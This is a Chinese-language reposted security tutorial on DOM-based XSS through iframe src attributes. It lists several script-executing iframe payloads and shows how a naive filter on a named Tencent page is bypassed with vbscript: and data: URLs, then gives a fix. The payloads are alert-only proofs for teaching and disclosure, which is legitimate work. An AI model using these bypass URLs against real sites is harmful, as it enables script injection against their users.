11.Dom Xss进阶 [善变iframe]

原創 红烧兔纸 2020-05-16 13:28

作者:心伤的瘦子

来自:PKAV技术宅社区

网址:http://www.pkav.net

----------------------------------------------------------------------------------

简要描述:

有时候,输出还会出现在 <iframe src="[输出]"></iframe> 。 iframe 的 src属性本来应该是一个网址,但是iframe之善变,使得它同样可以执行javascript,而且可以用不同的姿势来执行。这一类问题,我将其归为[路径可控]问题。当然上面说到的是普通的反射型XSS。有时候程序员会使用javascript来动态的改变iframe的src属性,譬如:iframeA.src="[可控的url]"; 同样会导致XSS问题,来看看本例吧~

详细说明:

1.先来说说iframe的变化。

1.1 最好懂的,onload执行js

<iframe οnlοad="alert(1)"></iframe>

1.2 src 执行javascript代码

<iframe src="javascript:alert(1)"></iframe>

1.3 IE下vbscript执行代码

<iframe src="vbscript:msgbox(1)"></iframe>

1.4 Chrome下data协议执行代码

<iframe src="data:text/html,<script>alert(1)</script>"></iframe> Chrome

1.5 上面的变体

<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

1.6 Chrome下srcdoc属性

<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

2. 有兴趣的,可以一个一个的去测试上面的效果,注意浏览器的特异性哦。

3. 接着我们来看看具体的例子。

http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=aaaaaa&gid=yl&cid=68&from=

4. 我们先开调试工具,看看有没有可见的输出。

可以看到,我们参数的aaaaaa被带入到了<iframe src="这里"></iframe>。

这样一来,就满足了我们的使用条件。

我们试试

http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=javascript:alert(1);&gid=yl&cid=68&from=

。。竟然没反应。我们来看看刚才的那个地方。

可以看到,src这次没属性了,看来腾讯做了什么过滤。我们继续搜索下一个toolframe试试。
恩,看来就是这段代码导致的。

一起看看这段代码。

function OpenFrame(url) {

	if (url.toLowerCase().indexOf('http://') != '-1' || url.toLowerCase().indexOf('https://') != '-1' || url.toLowerCase().indexOf('javascript:') != '-1') return false;

	document.getElementById("toolframe").src = url;

}

不难看出,腾讯对 javascript:做出了判断。

document.getElementById("toolframe").src = url;

这句是导致XSS的一句代码。而openFrame的url参数则来自于(无关代码省略):

...

var tool_url = getQueryStringValue("turl");

...

openFrame(tool_url);

...

5. 根据我们上面说道的iframe的利用方法,我们不难看出,腾讯的过滤是不完善的。

在IE下,我们可以使用vbscript来执行代码。 vbscript里 ' 单引号表示注释,类似JS里的//

http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=vbscript:msgbox(1)'&gid=yl&cid=68&from=

在chrome下,我们可以用data协议来执行JS。

http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=data:text/html,<script>alert(1)</script>'&gid=yl&cid=68&from=

6. 就到这里。

漏洞证明:

见详细说明

修复方案:

危险的不光是javascript:,

vbscript:, data: 等同样需要过滤。

 

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

9.Dom Xss入门 [隐式输出]

作者:心傷的瘦子 來自:PKAV技術宅社區 網址:http://www.pkav.net ---------------------------------------------------------------------- 簡要描

红烧兔纸 2020-06-20 21:10:02

21. 存储型XSS进阶 [猜测规则,利用Flash addCallback构造XSS]

作者:心傷的瘦子 來自:PKAV技術宅社區 網址:http://www.pkav.net --------------------------------------------------------------------------

红烧兔纸 2020-06-20 21:09:51

20. 存储型XSS入门 [套现绕过富文本]

红烧兔纸 2020-05-26 01:43:21

18. XSS过滤器绕过 [猥琐绕过]

红烧兔纸 2020-05-22 22:12:07

17. XSS过滤器绕过 [通用绕过]

红烧兔纸 2020-05-22 20:35:20

16. Flash Xss进阶 [ExternalInterface.call第二个参数]

红烧兔纸 2020-05-21 18:33:17

15. Flash Xss进阶 [ExternalInterface.call第一个参数]

红烧兔纸 2020-05-19 17:40:25

14. Flash Xss入门 [navigateToURL]

红烧兔纸 2020-05-19 17:40:25

13. Dom Xss实例 [Discuz X2.5]

红烧兔纸 2020-05-17 23:05:03

12.Dom Xss进阶 [路径con] ---没看懂,需要利用XSS扫描器,不会

红烧兔纸 2020-05-17 23:05:03

10.Dom Xss进阶 [邂逅eval]

红烧兔纸 2020-05-14 23:47:38

8.DOM XSS[显示输出]

红烧兔纸 2020-05-13 00:17:30

6.换行符复仇记

红烧兔纸 2020-05-11 22:34:08

7.宽字节、反斜线与换行符一起复仇记

红烧兔纸 2020-05-11 22:34:08

5.反斜线复仇记

红烧兔纸 2020-05-10 01:20:21